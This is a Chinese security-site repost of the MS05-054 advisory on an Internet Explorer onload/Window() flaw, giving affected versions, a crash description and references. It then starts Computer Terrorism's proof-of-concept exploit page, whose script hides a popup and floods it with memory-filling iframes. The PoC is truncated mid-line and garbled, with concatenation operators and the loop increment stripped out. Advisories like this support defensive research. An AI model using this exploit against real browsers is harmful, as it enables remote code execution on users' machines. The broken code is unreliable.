Microsoft IE JavaScript OnLoad处理器远程执行…

2008-04-09 04:16:36来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Microsoft IE JavaScript OnLoad处理器远程执行代码漏洞(MS05-054)

发布日期:2005-05-28
更新日期:2005-12-13

受影响系统:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.0 SP4
Microsoft Internet Explorer 5.5 SP2
- Microsoft Windows ME
Microsoft Internet Explorer 6.0
- Microsoft Windows XP SP2
- Microsoft Windows Server 2003 SP1
- Microsoft Windows Server 2003
描述:
BUGTRAQ ID: 13799
CVE(CAN) ID: CVE-2005-1790

Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。

如果同<BODY onload>事件使用的话,IE就不能正确的初始化JavaScript "Window()"函数,导致Internet Explorer在试图调用ECX中引用的32位地址时会出现异常:

CALL DWORD [ECX 8]

由于这个漏洞,名为"OBJECT"文本字符串的Unicode表示可能无意中构成ECX,具体来说就是0x006F005B。由于0x006F005B偏移指向无效的或不存在的内存位置,因此Internet Explorer就无法处理,终端用户会遇到拒绝服务。

尽管这个漏洞无法导致控制任何内部寄存器和/或指向任何无法控制的偏移,但某些情况下可能会允许执行远程代码。

<*来源:Benjamin Tobias Franz (0-1-2-3@gmx.de)
Stuart Pearson

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111746394106172&w=2
http://www.computerterrorism.com/research/ie/ct21-11-2005
http://www.microsoft.com/technet/security/advisory/911302.mspx
http://www.kb.cert.org/vuls/id/887861
http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx
http://www.us-cert.gov/cas/techalerts/TA05-347A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<!--
Computer Terrorism (UK)

============================================

Microsoft Internet Explorer JavaScript Window() - Proof Of Concept

============================================

Author:
--------

Stuart Pearson
Computer Terrorism (UK)
www.computerterrorism.com
21st November, 2005


THE FOLLOWING PROOF OF CONCEPT IS PROVIDED EXCLUSIVELY FOR EDUCATIONAL
PURPOSES ONLY, AND IS PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
WARRANTY. IN PARTICULAR, NEITHER THE AUTHOR NOR COMPUTER TERRORISM
MAKES ANY REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE FITNESS
OF THIS CODE FOR ANY PARTICULAR PURPOSE.

PERMISSION TO USE, COPY, PRINT, AND DISTRIBUTE THIS DOCUMENT FOR EDUCATIONAL
PURPOSES IS HEREBY GRANTED, PROVIDED THAT THE TEXTUAL CONTENT REMAINS INTACT
AND UNMODIFIED.
-->

<html>

<head>
<meta http-equiv="Content-Language" content="en-gb">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Computer Terrorism - Microsoft Internet Explorer Proof of Concept</title>
<script type="text/javascript">

function runpoc(iframecount)
{

document.getElementById('table1').rows[2].cells[0].innerHTML="<p align=center><B>
<font color=#339966 size=1 face=Arial>&nbsp;&nbsp;&nbsp;&nbsp;loading, please wait....
</font></p>"
document.getElementById('table1').rows[4].cells[0].innerHTML=""
document.getElementById('table1').rows[6].cells[0].innerHTML=""
document.getElementById('table1').rows[7].cells[0].innerHTML=""
document.getElementById('table1').rows[9].cells[0].innerHTML=""


top.consoleRef = open('blankWindow.htm','BlankWindow',
'width=1,height=1'
',menubar=0'
',toolbar=1'
',status=0'
',scrollbars=0'
',left=1'
',top=1'
',resizable=0')

top.consoleRef.blur();

top.consoleRef.document.writeln(
'<html>'
'<head>'
'<title>CT</title>'
'</head>'
'<body onBlur=self.blur()>'
'</body></html>'
)

self.focus() // Ensure the javascript prompt boxes are hidden in the background


for (i=1 ; i <=iframecount ; i )
{
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0
src=fillmem.htm></iframe>')
}

if( iframecount == 8 ){
//alert('8');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:多家厂商Wget/Curl NTLM用户名处理溢出漏洞

下一篇:Alt-N MDaemon/WorldClient邮件标题拒绝服务漏洞